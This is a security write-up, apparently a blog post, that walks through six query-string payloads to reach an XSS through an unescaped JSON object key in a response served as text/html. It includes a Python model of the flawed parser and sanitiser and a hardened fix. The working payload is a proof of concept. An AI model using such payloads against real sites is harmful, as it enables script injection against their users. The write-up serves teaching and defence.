Story of a JSON XSS

Suppose the following injection point exists, and the response is served with Content-Type: text/html.

{
	"xxx": true,
	"yyy": [injection_point]
}

Payload 1 - Failure

yyy=test<haha>

But the injection point HTML-encodes < and >.

{
	"xxx": true,
	"yyy": "test&lt;haha&gt;"
}

Payload 2 - Failure

yyy[testarray]=test

{
	"xxx": true,
	"yyy": {"testarray": "test"}
}

The bracket syntax is parsed into an object, so the key of that object is now under our control.

Payload 3 - Failure

yyy[<abc>]=test

{
	"xxx": true,
	"yyy": {"<abc>": "test"}
}

The key comes back without HTML encoding: only values are escaped. A bare <abc> tag does nothing by itself, so we need an attribute that runs script.

Payload 4 - Failure

yyy[<abc=>]=test

{
	"xxx": true,
	"yyy": null
}

The = inside the brackets is taken as the key/value separator, so the yyy parameter is never set and comes back as null.

Payload 5 - Failure

yyy[<abc%3D>]=test

{
	"xxx": true,
	"yyy": {"<abc=>": "test"}
}

Percent-encoding the = as %3D gets it through the query parser and into the key unchanged.

Payload 6 - Success

yyy[<abc onmouseover%3Dalert(1)>]=test

{
	"xxx": true,
	"yyy": {"<abc onmouseover=alert(1)>": "test"}
}

Because the response is text/html, the browser parses the unescaped key as markup and hovering over the element fires alert(1). When the request is actually sent, the space in the payload is percent-encoded as %20.
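The whole sequence above, as an added example that is not code from the original post: a Python model of the endpoint (a hypothetical PHP-style query parser, a sanitiser that escapes values but not keys, and a response sent as text/html), run against the six payloads, next to a hardened version that sets application/json with nosniff and writes <, > and & as \u escapes across the whole document, keys included. The parser, sanitiser and response shape are assumptions chosen to reproduce the behaviour the post shows; the real application's code is not known.

```python
import html
import json
import re
from urllib.parse import parse_qsl

# Constructed model of the endpoint in the post (not the original application's
# code): a PHP-style query parser that turns "yyy[key]=value" into a nested
# object, HTML-escaping applied to string values only, and the JSON document
# returned with Content-Type text/html. The parser and sanitiser are assumptions
# chosen to reproduce the behaviour seen in payloads 1 to 6.

BRACKET_KEY = re.compile(r"^([^\[\]]+)\[([^\]]*)\]$")


def parse_php_style(query: str) -> dict:
    """Build nested parameters the way PHP-style parsers do.

    parse_qsl splits each pair on the first '=' and then percent-decodes, so
    a raw '=' inside the brackets ends the key early (payload 4) while '%3D'
    survives as '=' inside the key (payload 5).
    """
    params = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        m = BRACKET_KEY.match(raw_key)
        if m:
            params.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            params[raw_key] = value
    return params


def escape_values_only(obj):
    """The flawed sanitiser: HTML-escapes string values, never dict keys."""
    if isinstance(obj, dict):
        return {k: escape_values_only(v) for k, v in obj.items()}
    if isinstance(obj, str):
        return html.escape(obj)
    return obj


def vulnerable_response(query: str) -> tuple:
    """(Content-Type, body) as the vulnerable endpoint would send them."""
    params = parse_php_style(query)
    body = {"xxx": True, "yyy": escape_values_only(params.get("yyy"))}
    return "text/html", json.dumps(body)


def contains_raw_tag(body: str) -> bool:
    """A browser given text/html will parse any literal '<tag' as markup."""
    return re.search(r"<[a-zA-Z]", body) is not None


_JSON_HTML_ESCAPES = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}


def json_for_html(obj) -> str:
    """Serialise with '<', '>' and '&' written as \\u escapes.

    The replacement runs over the serialised text, so keys and values get the
    same treatment, and the output is still valid JSON for the consumer.
    """
    out = json.dumps(obj)
    for ch, esc in _JSON_HTML_ESCAPES.items():
        out = out.replace(ch, esc)
    return out


def roundtrips(obj) -> bool:
    """The escaped document decodes back to the original data."""
    return json.loads(json_for_html(obj)) == obj


def hardened_response(query: str) -> tuple:
    """(headers, body): correct Content-Type, nosniff, and escaped output."""
    params = parse_php_style(query)
    body = {"xxx": True, "yyy": params.get("yyy")}
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, json_for_html(body)


# The six payloads from the post, in order.
PAYLOADS = [
    "yyy=test<haha>",
    "yyy[testarray]=test",
    "yyy[<abc>]=test",
    "yyy[<abc=>]=test",
    "yyy[<abc%3D>]=test",
    "yyy[<abc onmouseover%3Dalert(1)>]=test",
]

if __name__ == "__main__":
    for i, q in enumerate(PAYLOADS, 1):
        ct, body = vulnerable_response(q)
        print(f"Payload {i}: {q}\n  {ct}: {body}\n  raw tag in body: {contains_raw_tag(body)}")
    headers, body = hardened_response(PAYLOADS[-1])
    print(f"Hardened: {headers['Content-Type']}: {body}")
    print("  decodes to:", json.loads(body))
```

The Content-Type fix is the primary one: a browser will not render application/json as a page, and nosniff stops it from guessing otherwise. Escaping <, > and & at serialisation time is the second layer, it covers keys as well as values, and it also protects the same document if it is ever inlined into a <script> block in a template.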
